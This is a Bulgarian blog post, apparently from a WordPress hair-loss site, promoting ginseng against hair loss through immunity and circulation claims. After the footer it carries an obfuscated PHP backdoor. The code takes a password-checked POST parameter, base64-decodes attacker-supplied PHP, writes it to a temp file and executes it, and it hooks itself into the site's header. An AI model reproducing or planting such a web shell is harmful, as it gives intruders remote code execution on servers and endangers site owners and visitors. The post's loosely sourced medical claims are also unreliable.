Женшен и косопад | Косопад

Лечение на косопад с женшен

женшен при косопад

Женшен при косопад

Корените от женшен са използвани в китайската традиционна медицина от векове, заради многобройните си лечебни свойства. Първите сведения за това датират от 1 век след новата ера, намерени в стари свитъци с рецепти срещу косопад и други медицински състояния с тази вълшебна билка. Смята се, че женшенът има неповторими свойства за засилване на имунната система и при борба със сърдечно – съдови заболявания.

Имунна система и косопад

Дали ще страдаме от косопад или не е в пряка връзка със състоянието на имунната система. Ако кондицията на тялото е добра и то има сили да се бори с различните болести, тогава със сигурност ще се радваме на буйна и гъста коса. Ако организмът е зает да се бори с болести и всичките му функции за възстановяване са ангажирани с това, тогава ще имате проблеми и с окосмението. Женшенът стимулира силно имунната система и така помага да се предотврати косопад заради болести и стрес.

Сърдечно – съдови заболявания

Едно от сигурните средства срещу косопад и насърчаване растежа на косата, е стимулирането притока на кръв към главата. Водещи медици са убедени, че доброто кръвоснабдяване ще подобри в пъти състоянието на космените фоликули и в крайна сметка ще предотврати загубата на коса. За женшен се смята още, че има силни антиоксидантни свойства, които спомагат за доброто състояние на сърдечно – съдовата система и насърчаване кръвообращението. Все пак внимавайте, защото тази билка понякога повишава кръвното налягане и ако страдате от хипертония, задължително се консултирайте с лекар преди употреба.

Форми на женшен за употреба при косопад

Женшен може да намерите под различни форми – като екстракт, на прах или в капсули, под формата на сушени корени. Най – добре е да се прилага вътрешно като чай, но срещу косопад няма да е грешно, ако изплаквате косата с отвара поне един път в седмицата.

Може би тук е мястото да обясним, че китайският женшен не трябва да се бърка със сибирския, който има коренно различни съставки и свойства.

подсилване на косата

Как да подсилим косата с женшен

29. май 2013 18:21:40 от Косопад
Категории: Любопитно за косопада | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}